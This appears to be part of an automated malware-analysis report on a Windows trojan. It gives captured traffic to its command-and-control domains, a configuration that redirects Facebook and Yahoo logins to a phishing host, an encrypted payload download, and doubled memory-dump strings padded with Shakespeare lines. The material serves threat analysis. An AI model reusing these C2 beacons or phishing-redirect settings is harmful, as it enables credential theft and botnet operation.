ping.5.FLAG cfg.318."frontride.net" "spokethere.net" "mightglossary.net" "southblood.net" "uponloud.net" "gentlefriend.net" "tablefruit.net" "signarmy.net" "wifeyesterday.net" "wrongthrew.net" "saltsecond.net" "littleappear.net" "thistomorrow.net" "rememberpaint.net" "wifeknew.net" "whichsing.net" "necessarydress.net" "lasopeidres.com" var_user_ip.407.%send_aol_spam% = "1";.%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.Þp_host% = "partyorderly.net";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%cpuinfo% = " Intel(R) Atom(TM) CPU K510 @ 1.66GHz (1666 MHz)";.%state% = "BU";..............
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 502 Cannot find server.
Date: Wed, 14 May 2014 10:29:44 GMT
Server: YTS/1.20.28
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 2477
<HEAD><TITLE>Cannot find server.</TITLE></HEAD>.<BODY BGCOLOR="white" FGCOLOR="black">.<FONT FACE="Helvetica,Arial"><B>. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html><head><style>a:link {font:8pt/11pt verdana; color:red}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><meta HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"><title>Cannot find server</title></head><body bgcolor="white"><table width="400" cellpadding="3" cellspacing="5"><tr><td id="tableProps2" align="left" valign="middle" width="360"><h1 id="textSection1"style="COLOR: black; FONT: 13pt/15pt verdana"><span id="errorText">The page cannot be displayed</span></h1></td></tr><tr><td id="tablePropsWidth" width="400" colspan="2"><font style="COLOR: black; FONT: 8pt/11pt verdana">The page you are looking for is currently unavailable. The Web site might be experiencing technical difficulties, or you may need to adjust your browser settings.</font></td></tr><tr><td id="tablePropsWidth" width="400" colspan="2"><font id="LID1"style="COLOR: black; FONT: 8pt/11pt verdana"><hr color="#C0C0C0" noshade><p id="LID2">Please try the following:</p><ul><li id="instructionsText1">Click the Refresh button, or try again later.</li><li id="instructionsText2"> If you typed the page addr
<<
<<< skipped >>>
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: fredesecas.com
HTTP/1.1 404 Not Found
Date: Wed, 14 May 2014 10:30:27 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 21
Cache-control: no-store
Pragma: no-cache
Connection: close
Content-Type: text/html
Unknown Virtual Host...
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: davedekilai.com
HTTP/1.1 302 Found
Date: Wed, 14 May 2014 10:30:28 GMT
Server: Apache
Location: hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekilai.com?method=validate&mode=sox&v=029&sox=3c801802
Content-Length: 375
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekilai.com?method=validate&mode=sox&v=029&sox=3c801802">here</a>.</p>.<hr>.<address>Apache Server at davedekilai.com Port 80</address>.</body></html>...
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: stickmarch.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:29:46 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2599
Keep-Alive: timeout=5, max=125
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://stickmarch.net/?fp=NW2h08TAj7gbVUttw+xPVWVSFWaTBxrHiZqdPXCM1svDvDZj3S/1NgrSEz9Zu3JEf1rzQ1hcG7ba3OfbEsRspw==&prvtof=BE7b74bkKxSMO7Gg0oA8cRYUY8mdRLyJ08mI642nGpw=&poru=j3wdAEauXXLonOEwgYzkE0rLayDJqs4fehr/PbrJnRo25j0kvK5KhU9dGDWdrqBRppKA4ZZKzKtGzaPXdobpSgRWz6YnX2Rszj56RoLJeEGzYxD11+GjaWk3jBXTGY6f&cifr=1&method=validate&mode=sox&v=023&sox=3c801802";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://stickmarch.net/?fp=NW2h08TAj7gbVUttw+xPVWVSFWaTBxrHiZqdPXCM1svDvDZj3S/1NgrSEz9Zu3JEf1rzQ1hcG7ba3OfbEsRspw==&prvtof=mAULZ+n4ckB2+bP0yNbRC+IDToxI3XfDbcsX4+bvyh4%3D&poru=40svIkffRVdZYCtF0u6SMdx3r87rr1LbQln9I6FyWtoUkyyyJ8sgXZtP9WLY2YB8SPUktXhCTsr/xkPQ/MblgiNO7KnE2MHpPpHuZe9cvGEAGJTLRRhbzs2iego1
<<
<<< skipped >>>
GET /forum/search.php?method=checkport&port=28929&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:29:53 GMT
Server: Apache/2
Content-Length: 0
Connection: close
Content-Type: text/html
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:32 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
304...sS........groupcook.net................n.i`.....#.........}K `.l$aC".x...Q@W?6.]...~.;"..w7..P..4.5K|...$.xB.B..N;S.....B.A3..7%*.....1h>.T0.n...H..~.i\.*.OC..9...Mqp.u..w?.Qn....>.......F..,..oDi.8P..H.....,.W.l....9R.\.]a_.W..... ..r.>.......W!.i........C.P..$^".p.... .MR.....$....TU..1-....n:.e.......HI....In...Mb.....Rm.N|lH.-(...I.18.........>.).Hx....!.xd^.}..q.o...uio8.CW&}........cb......~.z6....k,.&f.....(....pr........u...,...N=.Vv.F.......}.%.i.....R..kr.l..N.y/.9.G..,.[...c.c....4....Vp4...X...).{X...@.l....W.....F#`.1....>'....W.Q.|.........P.L......P.5.b. Dj/..Y,.]......k.|.F..-....{jC.)l..C.?....C...B.'..l..\I..B\y..,y...0]..iT..-#.....w?.."4YF.5M=i.DD....=.j8......C...1jQ.,!...;...RR.2..3...x.............tu..u..MW....01.*.LD.D.~............;..i...ks.N.I....vf..m..8Dk'u..G...R.....Z..>..0..wMj._u.Hv.f.(..F.LW../x.GB...1.....{....{.._.U...;6LX&.Gu...........:)....W~1./..~.....Q... .s..bs..-%.&...$.].......w.?.D...B./..|c.2w..3......m..u&5......X.f...$...k.-Y..l.g:a....<....Zm.9....I ..$.C.'....Z....y.X.fg..k#`...W...T.......|j...r..X..Z......t.}...J.R1.$_.s.H.s.....S .U9$.k......G......4.\......7.:.\e..*$.;....Mb.8.......^..N. ....}X.T..f.,.....UMAs...T..@T..K....".Y.........a)\.........ow........
GET /forum/search.php?method=all&flag&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:11 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
ping.5.FLAG cfg.318."tablefruit.net" "frontride.net" "thistomorrow.net" "gentlefriend.net" "saltsecond.net" "wifeknew.net" "signarmy.net" "uponloud.net" "whichsing.net" "spokethere.net" "necessarydress.net" "mightglossary.net" "wrongthrew.net" "wifeyesterday.net" "southblood.net" "rememberpaint.net" "littleappear.net" "lasopeidres.com" var_user_ip.384.%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.Þp_host% = "partyorderly.net";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%cpuinfo% = " Intel(R) Atom(TM) CPU K510 @ 1.66GHz (1666 MHz)";.%state% = "BU";..............
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: stickmarch.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:30 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2593
Keep-Alive: timeout=5, max=126
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://stickmarch.net/?fp=RpovpAuC9ow5NmSXYSbYsAXW1b73tgquI4E1/CwV/Wj6ETs9V0ofVKvKbqDKjJD3SK789uoMvj1F7no0hWD7Kg==&prvtof=I3dbGXzv5zNA35ev750NKcXNaDpkuIgs1pDEwcENjEc=&poru=CXYqjTCPXoqD25L1oVyRCcXS69zxD9DQVU8Lo/+hqZ2ak/mOtqkXrPaUCVs3/SIsEWiWZvYinWTYyaum7A1EoqVJEpy2wKADX0luiv1zlZ39qs+KKM+2wZN8/UmQweNp&cifr=1&method=validate&mode=sox&v=029&sox=3c801802";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://stickmarch.net/?fp=RpovpAuC9ow5NmSXYSbYsAXW1b73tgquI4E1/CwV/Wj6ETs9V0ofVKvKbqDKjJD3SK789uoMvj1F7no0hWD7Kg==&prvtof=iIrQ4D05RxmqJCCqMbYJyWfc0J2NhXH1fj4rhcgAytM=&poru=0UT14yB9hwcBlx7MVz01pmfo6xBSj243Qt4wm1dq4bawCEoGNAQwgbgCPVfIcGbU02sDo6trGumf+hovPOidEGPSbsMOv4RcY7tJgdAAZJK+Y+ZvwfWH1bww
<<
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: laloponea.com
HTTP/1.1 404 Not Found
Date: Wed, 14 May 2014 10:29:43 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 21
Cache-control: no-store
Pragma: no-cache
Connection: close
Content-Type: text/html
Unknown Virtual Host...
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
smp5hldgdxzo4u.exe_2804:
.text
.text
`.rdata
`.rdata
@.data
@.data
QSSSSSSh
QSSSSSSh
j.PVf
j.PVf
}<%uy
}<%uy
~NSSSh
~NSSSh
\$xSSShp
\$xSSShp
SSSh`vD
SSSh`vD
u#SSSh uC
u#SSSh uC
tgSSSh
tgSSSh
SSSh0
SSSh0
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
WS2_32.dll
WS2_32.dll
OLEAUT32.dll
OLEAUT32.dll
cmd.exe
cmd.exe
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
GDI32.dll
GDI32.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
GetKeyboardType
GetKeyboardType
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
rtfrebrgje.exe
rtfrebrgje.exe
zo4u.exe
zo4u.exe
Services Portable Audio Compatibility Class
Services Portable Audio Compatibility Class
ionica_chirac@yahoo.com
ionica_chirac@yahoo.com
dklhlsph.exe
dklhlsph.exe
mIB.Ts
mIB.Ts
.gHw?
.gHw?
aB.Bcr
aB.Bcr
.Py0?
.Py0?
es`%sDh
es`%sDh
' RB%S>
' RB%S>
zcÁ
zcÁ
%Documents and Settings%\LocalService
%Documents and Settings%\LocalService
%WinDir%\TEMP\smp5hldgdxzo4u.exe
%WinDir%\TEMP\smp5hldgdxzo4u.exe
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL
rtfrebrgje.exe_1104:
.text
.text
`.rdata
`.rdata
@.data
@.data
QSSSSSSh
QSSSSSSh
SQSSSh
SQSSSh
-yr%XWf
-yr%XWf
SSSh0
SSSh0
SSSh@
SSSh@
u#SSSh@
u#SSSh@
t>SSSh`
t>SSSh`
t!SSSh
t!SSSh
FSSSh
FSSSh
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
WS2_32.dll
WS2_32.dll
OLEAUT32.dll
OLEAUT32.dll
cmd.exe
cmd.exe
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
GDI32.dll
GDI32.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
GetProcessHeap
GetProcessHeap
See how the surly Warwick mans the wall!
See how the surly Warwick mans the wall!
O unbid spite! is sportful Edward come?
O unbid spite! is sportful Edward come?
I am so sorry for my trespass made
I am so sorry for my trespass made
O passing traitor, perjured and unjust!
O passing traitor, perjured and unjust!
rtfrebrgje.exe
rtfrebrgje.exe
zr.exe
zr.exe
Services Portable Audio Compatibility Class
Services Portable Audio Compatibility Class
dklhlsph.exe
dklhlsph.exe
Then put up your pipes in your bag, for I'll away:
Then put up your pipes in your bag, for I'll away:
[Exeunt]
[Exeunt]
an into their estimation and report: but he hath so
an into their estimation and report: but he hath so
ingrateful injury; to report otherwise, were a
ingrateful injury; to report otherwise, were a
good compass: and now I live out of all order, out
good compass: and now I live out of all order, out
of all compass.
of all compass.
Look on his letter, madam; here's my passport.
Look on his letter, madam; here's my passport.
Like lies disdain'd in the reporting.
Like lies disdain'd in the reporting.
Report thy parentage. I think thou said'st
Report thy parentage. I think thou said'st
c.umd.edu>, and submitted to the SHAKSPER Global
c.umd.edu>, and submitted to the SHAKSPER Global
Electronic Conference <SHAKSPER> in October 1991.</SHAKSPER>
Electronic Conference <SHAKSPER> in October 1991.</SHAKSPER>
TO.THE.ONLIE.BEGETTER.OF.
TO.THE.ONLIE.BEGETTER.OF.
THESE.INSVING.SONNETS.
THESE.INSVING.SONNETS.
Mr.W.H.ALL.HAPPINESSE.
Mr.W.H.ALL.HAPPINESSE.
AND.THAT.ETERNITIE.
AND.THAT.ETERNITIE.
OVR.EVER-LIVING.POET.
OVR.EVER-LIVING.POET.
THE.WELL-WISHING.
THE.WELL-WISHING.
ADVENTVRER.IN.
ADVENTVRER.IN.
}.Gz|?q!
}.Gz|?q!
\.BTz
\.BTz
Certain ones then.
Certain ones then.
Shalt have thy trespass cited up in rhymes,
Shalt have thy trespass cited up in rhymes,
That sought to be encompass'd with your crown:
That sought to be encompass'd with your crown:
Nor thou within the compass of my curse.
Nor thou within the compass of my curse.
Nor no one here; for curses never pass
Nor no one here; for curses never pass
Nay, that's certain; we have the exhibition to examine.
Nay, that's certain; we have the exhibition to examine.
led to execution]
led to execution]
They shall have none, I swear, but these my joints;
They shall have none, I swear, but these my joints;
@Ÿy
@Ÿy
.sKN$w
.sKN$w
This beauteous lady Thisby is certain.
This beauteous lady Thisby is certain.
[Exeunt Prologue, Thisbe, Lion, and Moonshine]
[Exeunt Prologue, Thisbe, Lion, and Moonshine]
i[2.LXt
i[2.LXt
.yDp\
.yDp\
her as long as there is a passage in my throat and
her as long as there is a passage in my throat and
before the priest; and certainly a woman's thought
before the priest; and certainly a woman's thought
than a monkey: I will weep for nothing, like Diana
than a monkey: I will weep for nothing, like Diana
Did point you to buy them, along as you pass'd:
Did point you to buy them, along as you pass'd:
And since I have not much importuned you;
And since I have not much importuned you;
Who having, by their own importunate suit,
Who having, by their own importunate suit,
to conceive, nor his heart to report, what my dream
to conceive, nor his heart to report, what my dream
transported.
transported.
if our sport had gone forward, we had all been made
if our sport had gone forward, we had all been made
To ask of whence you are. Report it.
To ask of whence you are. Report it.
[Knocking within. Enter a Porter]
[Knocking within. Enter a Porter]
Porter
Porter
man were porter of hell-gate, he should have
man were porter of hell-gate, he should have
old turning the key.
old turning the key.
Yzd of great import indeed, too, but let
Yzd of great import indeed, too, but let
that pass: for I must tell thee, it will please his
that pass: for I must tell thee, it will please his
heart, let that pass. By the world, I recount no
heart, let that pass. By the world, I recount no
fable: some certain special honours it pleaseth his
fable: some certain special honours it pleaseth his
travel, that hath seen the world; but let that pass.
travel, that hath seen the world; but let that pass.
For princes to come view fair Portia:
For princes to come view fair Portia:
As o'er a brook, to see fair Portia.
As o'er a brook, to see fair Portia.
Lies all within. Deliver me the key:
Lies all within. Deliver me the key:
PORTIA
PORTIA
Portia, adieu. I have :
Portia, adieu. I have :
Do so conjointly meet, let not men s
Do so conjointly meet, let not men s
[Exeunt KING LEAR, GLOUCESTER, KENT, and Fool]
[Exeunt KING LEAR, GLOUCESTER, KENT, and Fool]
And I a heavy interim shall support
And I a heavy interim shall support
He cannot temperately transport his honours
He cannot temperately transport his honours
In execution.
In execution.
Whose father then, as men report
Whose father then, as men report
The time is out of joint: O cursed spite,
The time is out of joint: O cursed spite,
By this encompassment and drift of question
By this encompassment and drift of question
that our armies join not in a hot day; for, by the
that our armies join not in a hot day; for, by the
.rgGD
.rgGD
and QUINTUS, bound, passing on to the place of
and QUINTUS, bound, passing on to the place of
istook your passion;
istook your passion;
Here, all enraged, such passion her assails,
Here, all enraged, such passion her assails,
To have proved most royally: and, for his passage,
To have proved most royally: and, for his passage,
[A dead march. Exeunt, bearing off the dead
[A dead march. Exeunt, bearing off the dead
I speak from certainties. Nay, more,
I speak from certainties. Nay, more,
To hurl upon their heads that break his law.
To hurl upon their heads that break his law.
And that same vengeance doth he hurl on thee,
And that same vengeance doth he hurl on thee,
Of dear import, and the neglecting it
Of dear import, and the neglecting it
it agrees well, passant; it is a familiar beast to
it agrees well, passant; it is a familiar beast to
But your request shall make me let it pass.
But your request shall make me let it pass.
Is this certain?
Is this certain?
purse; I could have filed keys off that hung in
purse; I could have filed keys off that hung in
By God's fair ordinance conjoin together!
By God's fair ordinance conjoin together!
Bury it certain fathoms in the earth,
Bury it certain fathoms in the earth,
before the report come. If there be breadth enou
before the report come. If there be breadth enou
With willing sport to the wild ocean.
With willing sport to the wild ocean.
[Exeunt HUBERT with PETER]
[Exeunt HUBERT with PETER]
The abuse of greatness is, when it disjoins
The abuse of greatness is, when it disjoins
[Exeunt Pyramus and Thisbe]
[Exeunt Pyramus and Thisbe]
themselves, they may pass for excellent men. Here
themselves, they may pass for excellent men. Here
Then know that I, one Snug the joiner, am
Then know that I, one Snug the joiner, am
[Exeunt all but BENEDICK and BEATRICE]
[Exeunt all but BENEDICK and BEATRICE]
My master is of churlish disposition
My master is of churlish disposition
Go with me: if you like upon report
Go with me: if you like upon report
of; which imports to the kingdom so much
of; which imports to the kingdom so much
Over her passion; who, most rebel-like,
Over her passion; who, most rebel-like,
But if you fondly pass our proffer'd offer,
But if you fondly pass our proffer'd offer,
I wish ye sport.
I wish ye sport.
Experience, O, thou disprovest report!
Experience, O, thou disprovest report!
Making lascivious comments on thy sport,
Making lascivious comments on thy sport,
Naming thy name blesses an ill report.
Naming thy name blesses an ill report.
Some say thy grace is youth and gentle sport;
Some say thy grace is youth and gentle sport;
I fear'd thy fortune, and my joints did tremble.
I fear'd thy fortune, and my joints did tremble.
And from the organ-pipe of frailty sings
And from the organ-pipe of frailty sings
It would not out at windows nor at doors.
It would not out at windows nor at doors.
[Flourish. Exeunt]
[Flourish. Exeunt]
And good supporters are you.
And good supporters are you.
Each one with ireful passion, with drawn swords,
Each one with ireful passion, with drawn swords,
Sport and repose lock from me day and night!
Sport and repose lock from me day and night!
So 'tis reported:
So 'tis reported:
Hortensio's passion;
Hortensio's passion;
[Exeunt BIANCA and Servant]
[Exeunt BIANCA and Servant]
Shall find him by his large and portly size.
Shall find him by his large and portly size.
And the very ports they blow,
And the very ports they blow,
My true love's passion: therefore pardon me,
My true love's passion: therefore pardon me,
say, you cannot pass. Therefore, go back.
say, you cannot pass. Therefore, go back.
[Exeunt CORIOLANUS and AUFIDIUS. The two
[Exeunt CORIOLANUS and AUFIDIUS. The two
false report of him.
false report of him.
come to pass, say Pompey told you so.
come to pass, say Pompey told you so.
Yet are they passing cowardly. But, I beseech you,
Yet are they passing cowardly. But, I beseech you,
[Exeunt FALSTAFF and Justices]
[Exeunt FALSTAFF and Justices]
Be avised, sir, and pass good humours: I will say
Be avised, sir, and pass good humours: I will say
so conclusions passed the careires.
so conclusions passed the careires.
And, kinsmen, then we may go pipe for justice.
And, kinsmen, then we may go pipe for justice.
Join with the Goths; and with revengeful war
Join with the Goths; and with revengeful war
Sport royal, I warrant you: I know my physic will
Sport royal, I warrant you: I know my physic will
but from proof as strong as my grief and as certain
but from proof as strong as my grief and as certain
her life: I shall give thee opportunity at
her life: I shall give thee opportunity at
where, if thou fear to strike and to make me certain
where, if thou fear to strike and to make me certain
in several disports. Whereupon the nobqUY
in several disports. Whereupon the nobqUY
[Exeunt Citizens]
[Exeunt Citizens]
'His browny locks did hang in crooked curls;
'His browny locks did hang in crooked curls;
Upon his lips their silken parcels hurls.
Upon his lips their silken parcels hurls.
zcÁ
zcÁ
%System%\dklhlsph.exe
%System%\dklhlsph.exe
|groupcook.net
|groupcook.net
WATCHDOGPROC "c:\windows\system32\rtfrebrgje.exe"
WATCHDOGPROC "c:\windows\system32\rtfrebrgje.exe"
%System%\rtfrebrgje.exe
%System%\rtfrebrgje.exe
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL
ihj3deeem5zr.exe_704:
.text
.text
`.rdata
`.rdata
@.data
@.data
QSSSSSSh
QSSSSSSh
SQSSSh
SQSSSh
-yr%XWf
-yr%XWf
SSSh0
SSSh0
SSSh@
SSSh@
u#SSSh@
u#SSSh@
t>SSSh`
t>SSSh`
t!SSSh
t!SSSh
FSSSh
FSSSh
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
WS2_32.dll
WS2_32.dll
OLEAUT32.dll
OLEAUT32.dll
cmd.exe
cmd.exe
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
GDI32.dll
GDI32.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
GetProcessHeap
GetProcessHeap
See how the surly Warwick mans the wall!
See how the surly Warwick mans the wall!
O unbid spite! is sportful Edward come?
O unbid spite! is sportful Edward come?
I am so sorry for my trespass made
I am so sorry for my trespass made
O passing traitor, perjured and unjust!
O passing traitor, perjured and unjust!
rtfrebrgje.exe
rtfrebrgje.exe
zr.exe
zr.exe
Services Portable Audio Compatibility Class
Services Portable Audio Compatibility Class
dklhlsph.exe
dklhlsph.exe
Then put up your pipes in your bag, for I'll away:
Then put up your pipes in your bag, for I'll away:
[Exeunt]
[Exeunt]
an into their estimation and report: but he hath so
an into their estimation and report: but he hath so
ingrateful injury; to report otherwise, were a
ingrateful injury; to report otherwise, were a
good compass: and now I live out of all order, out
good compass: and now I live out of all order, out
of all compass.
of all compass.
Look on his letter, madam; here's my passport.
Look on his letter, madam; here's my passport.
Like lies disdain'd in the reporting.
Like lies disdain'd in the reporting.
Report thy parentage. I think thou said'st
Report thy parentage. I think thou said'st
c.umd.edu>, and submitted to the SHAKSPER Global
c.umd.edu>, and submitted to the SHAKSPER Global
Electronic Conference <SHAKSPER> in October 1991.</SHAKSPER>
Electronic Conference <SHAKSPER> in October 1991.</SHAKSPER>
TO.THE.ONLIE.BEGETTER.OF.
TO.THE.ONLIE.BEGETTER.OF.
THESE.INSVING.SONNETS.
THESE.INSVING.SONNETS.
Mr.W.H.ALL.HAPPINESSE.
Mr.W.H.ALL.HAPPINESSE.
AND.THAT.ETERNITIE.
AND.THAT.ETERNITIE.
OVR.EVER-LIVING.POET.
OVR.EVER-LIVING.POET.
THE.WELL-WISHING.
THE.WELL-WISHING.
ADVENTVRER.IN.
ADVENTVRER.IN.
}.Gz|?q!
}.Gz|?q!
\.BTz
\.BTz
Certain ones then.
Certain ones then.
Shalt have thy trespass cited up in rhymes,
Shalt have thy trespass cited up in rhymes,
That sought to be encompass'd with your crown:
That sought to be encompass'd with your crown:
Nor thou within the compass of my curse.
Nor thou within the compass of my curse.
Nor no one here; for curses never pass
Nor no one here; for curses never pass
Nay, that's certain; we have the exhibition to examine.
Nay, that's certain; we have the exhibition to examine.
led to execution]
led to execution]
They shall have none, I swear, but these my joints;
They shall have none, I swear, but these my joints;
@Ÿy
@Ÿy
.sKN$w
.sKN$w
This beauteous lady Thisby is certain.
This beauteous lady Thisby is certain.
[Exeunt Prologue, Thisbe, Lion, and Moonshine]
[Exeunt Prologue, Thisbe, Lion, and Moonshine]
i[2.LXt
i[2.LXt
.yDp\
.yDp\
her as long as there is a passage in my throat and
her as long as there is a passage in my throat and
before the priest; and certainly a woman's thought
before the priest; and certainly a woman's thought
than a monkey: I will weep for nothing, like Diana
than a monkey: I will weep for nothing, like Diana
Did point you to buy them, along as you pass'd:
Did point you to buy them, along as you pass'd:
And since I have not much importuned you;
And since I have not much importuned you;
Who having, by their own importunate suit,
Who having, by their own importunate suit,
to conceive, nor his heart to report, what my dream
to conceive, nor his heart to report, what my dream
transported.
transported.
if our sport had gone forward, we had all been made
if our sport had gone forward, we had all been made
To ask of whence you are. Report it.
To ask of whence you are. Report it.
[Knocking within. Enter a Porter]
[Knocking within. Enter a Porter]
Porter
Porter
man were porter of hell-gate, he should have
man were porter of hell-gate, he should have
old turning the key.
old turning the key.
Yzd of great import indeed, too, but let
Yzd of great import indeed, too, but let
that pass: for I must tell thee, it will please his
that pass: for I must tell thee, it will please his
heart, let that pass. By the world, I recount no
heart, let that pass. By the world, I recount no
fable: some certain special honours it pleaseth his
fable: some certain special honours it pleaseth his
travel, that hath seen the world; but let that pass.
travel, that hath seen the world; but let that pass.
For princes to come view fair Portia:
For princes to come view fair Portia:
As o'er a brook, to see fair Portia.
As o'er a brook, to see fair Portia.
Lies all within. Deliver me the key:
Lies all within. Deliver me the key:
PORTIA
PORTIA
Portia, adieu. I have :
Portia, adieu. I have :
Do so conjointly meet, let not men s
Do so conjointly meet, let not men s
[Exeunt KING LEAR, GLOUCESTER, KENT, and Fool]
[Exeunt KING LEAR, GLOUCESTER, KENT, and Fool]
And I a heavy interim shall support
And I a heavy interim shall support
He cannot temperately transport his honours
He cannot temperately transport his honours
In execution.
In execution.
Whose father then, as men report
Whose father then, as men report
The time is out of joint: O cursed spite,
The time is out of joint: O cursed spite,
By this encompassment and drift of question
By this encompassment and drift of question
that our armies join not in a hot day; for, by the
that our armies join not in a hot day; for, by the
.rgGD
.rgGD
and QUINTUS, bound, passing on to the place of
and QUINTUS, bound, passing on to the place of
istook your passion;
istook your passion;
Here, all enraged, such passion her assails,
Here, all enraged, such passion her assails,
To have proved most royally: and, for his passage,
To have proved most royally: and, for his passage,
[A dead march. Exeunt, bearing off the dead
[A dead march. Exeunt, bearing off the dead
I speak from certainties. Nay, more,
I speak from certainties. Nay, more,
To hurl upon their heads that break his law.
To hurl upon their heads that break his law.
And that same vengeance doth he hurl on thee,
And that same vengeance doth he hurl on thee,
Of dear import, and the neglecting it
Of dear import, and the neglecting it
it agrees well, passant; it is a familiar beast to
it agrees well, passant; it is a familiar beast to
But your request shall make me let it pass.
But your request shall make me let it pass.
Is this certain?
Is this certain?
purse; I could have filed keys off that hung in
purse; I could have filed keys off that hung in
By God's fair ordinance conjoin together!
By God's fair ordinance conjoin together!
Bury it certain fathoms in the earth,
